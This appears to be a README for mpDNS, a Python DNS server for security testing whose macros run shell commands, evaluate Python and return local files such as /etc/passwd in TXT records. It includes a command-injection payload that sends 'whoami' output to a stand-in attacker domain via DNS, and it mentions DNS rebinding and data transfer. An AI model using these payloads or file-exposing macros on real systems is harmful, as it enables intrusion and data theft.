Simple, configurable "clone & run" DNS Server with multiple useful features
- Should work on Python 2 and 3
- names.db -> holds all custom records (see examples)
- Simple wildcards like *.example.com
- Catch unicode dns requests
- Custom actions aka macro:
{{shellexec::dig google.com +short}}
-> Execute shell command and respond with result{{eval::res = '1.1.1.%d' % random.randint(0,256)}}
-> Evaluate your python code{{file::/etc/passwd}}
-> Respond with localfile contents{{resolve}}
-> Forward DNS request to local system DNS{{resolve::example.com}}
-> Resolve example.com instead of original record{{echo}}
-> Response back with peer address{{shellexec::echo %PEER% %QUERY%}}
-> Use of variables
- Supported query types:
A
,CNAME
,TXT
- Update
names.db
records without restart/reload with./mpdns.py -e
Usage:
./mpdns.py
- Edit names.db with
./mpdns.py -e
no restart required
Offensive and Defensive purposes:
- You need a light-weight simple dns-server solution for testing purposes (NOT PRODUCTION!)
- Test for various blind injectionvulnerabilities in web applications (ex.
/ping.php?ip=$(dig $(whoami).attacker.com)
) - Easily infiltrate 65K of data in one
TXT
query - DNS Rebinding
- Execute custom macro action on specific query (useful in malware-analysis lab environments)
- And lots more. It is highly customizable.
Installing
git clone https://github.com/nopernik/mpDNS
Limitations
- Due to UDP Datagram limit of 65535 bytes, DNS response is limited to approx ~65200 bytes
this limitation applies toTXT
records which are splitted into chunks of 256 bytes until response reaches maximum allowed 65200b
thereforeTXT
record with macro{{file:localfile.txt}}
is limited to 65200 bytes. - No support for nested wildcards
test.*.example.com
- No support for custom DNS server resolver in
{{resolve::example.com}}
macro TTL
always set to 0
Examples
names.db example:
# Empty configuration will result in empty but valid responses
#
# Unicode domain names are not supported but still can be catched by the server.
# for example мама-сервер-unicode.google.com will be catched but with SERVFAIL response
passwd.example.com TXT {{file::/etc/passwd}} #comments are ignored
shellexec TXT {{shellexec::whoami}}
eval TXT {{eval::import random; res = random.randint(1,500)}}
resolve1 A {{resolve}}
resolve2 A {{resolve::self}} #same as previous
resolve3 A {{resolve::example.com}}
blabla.com A 5.5.5.5
* A 127.0.0.1
*.example.com A 7.7.7.7
c1.example.com CNAME c2.example.com
c2.example.com CNAME c3.example.com
c3.example.com CNAME google.example.com
google.example.com CNAME google.com
test.example.com A 8.8.8.8
google.com A {{resolve::self}}notgoogle.com A {{resolve::google.com}}
Example output with names.db example:
Regular resolution from DB:
dig test.example.com @localhost
;; ANSWER SECTION:
test.example.com. 0 IN A 8.8.8.8
mpDNS output:- Request from 127.0.0.1:57698 -> test.example.com. -> 8.8.8.8 (A)
Recursive CNAME resolution:
dig c1.example.com @localhost
;; QUESTION SECTION:
;c1.example.com. IN A
;; ANSWER SECTION:
c1.example.com. 0 IN CNAME c2.example.com.
c2.example.com. 0 IN CNAME c3.example.com.
c3.example.com. 0 IN CNAME google.example.com.
google.example.com. 0 IN CNAME google.com.
google.com. 0 IN A 216.58.206.14
mpDNS output:- Request from 127.0.0.1:44120 -> c1.example.com. -> c2.example.com (CNAME)
- Request from 127.0.0.1:44120 -> c2.example.com -> c3.example.com (CNAME)
- Request from 127.0.0.1:44120 -> c3.example.com -> google.example.com (CNAME)
- Request from 127.0.0.1:44120 -> google.example.com -> google.com (CNAME)
- Request from 127.0.0.1:44120 -> google.com -> {{resolve::self}} (A)
Wildcard resolution:
dig not-in-db.com @localhost
;; ANSWER SECTION:
not-in-db.com. 0 IN A 127.0.0.1
mpDNS output:- Request from 127.0.0.1:38528 -> not-in-db.com. -> 127.0.0.1 (A)
Wildcard subdomain resolution:
dig wildcard.example.com @localhost
;; ANSWER SECTION:
wildcard.example.com. 0 IN A 7.7.7.7
mpDNS output:- Request from 127.0.0.1:39691 -> wildcard.example.com. -> 7.7.7.7 (A)
Forward request macro:
dig google.com @localhost
;; ANSWER SECTION:
google.com. 0 IN A 172.217.22.110
mpDNS output:- Request from 127.0.0.1:53487 -> google.com. -> {{resolve::self}} (A)
Forward request of custom domain macro:
dig notgoogle.com @localhost
;; ANSWER SECTION:
notgoogle.com. 0 IN A 172.217.22.110
mpDNS output:- Request from 127.0.0.1:47797 -> notgoogle.com. -> {{resolve::google.com}} (A)
File contents macro via TXT query:
dig txt passwd.example.com @localhost
;; ANSWER SECTION:
passwd.example.com. 0 IN TXT "root:x:0:0:root:/root:/bin/bash\010daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\010bin:x:2:2:bin:......stripped"
mpDNS output:- Request from 127.0.0.1:38805 -> passwd.example.com. -> ['root:x:0:0:root...(2808)'] (TXT)
Custom python code macro via TXT query:
dig txt eval @localhost
;; ANSWER SECTION:
eval. 0 IN TXT "320"
mpDNS output:- Request from 127.0.0.1:33821 -> eval. -> ['320'] (TXT)
Shell command macro via TXT query:
dig txt shellexec @localhost
;; ANSWER SECTION:
shellexec. 0 IN TXT "root"
mpDNS output:- Request from 127.0.0.1:50262 -> shellexec. -> ['root'] (TXT)
Have fun!